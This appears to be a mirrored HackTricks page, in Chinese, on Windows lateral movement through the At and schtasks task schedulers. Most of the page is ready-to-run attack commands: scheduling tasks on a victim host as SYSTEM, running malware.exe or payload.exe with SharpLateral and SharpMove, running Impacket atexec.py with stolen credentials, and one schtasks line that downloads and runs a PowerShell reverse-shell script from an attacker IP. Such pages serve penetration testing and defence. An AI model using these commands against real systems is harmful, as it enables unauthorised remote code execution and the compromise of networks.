mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
36 lines
1.6 KiB
Markdown
36 lines
1.6 KiB
Markdown
# AtExec / SchtasksExec
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## 它是如何工作的
|
||
|
||
At 允许在你知道用户名/(密码/哈希)的主机上调度任务。因此,你可以使用它在其他主机上执行命令并获取输出。
|
||
```
|
||
At \\victim 11:00:00PM shutdown -r
|
||
```
|
||
使用 schtasks,您需要首先创建任务,然后调用它:
|
||
```bash
|
||
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
|
||
schtasks /run /tn <TASK_NAME> /S <VICTIM>
|
||
```
|
||
|
||
```bash
|
||
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
|
||
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
|
||
```
|
||
您可以使用 **Impacket的 `atexec.py`** 通过 AT 命令在远程系统上执行命令。这需要目标系统的有效凭据(用户名和密码或哈希)。
|
||
```bash
|
||
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
|
||
```
|
||
您还可以使用 [SharpLateral](https://github.com/mertdas/SharpLateral):
|
||
```bash
|
||
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
|
||
```
|
||
您可以使用 [SharpMove](https://github.com/0xthirteen/SharpMove):
|
||
```bash
|
||
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
|
||
```
|
||
有关[**使用 schtasks 和银票的更多信息在这里**](../active-directory-methodology/silver-ticket.md#host)。
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|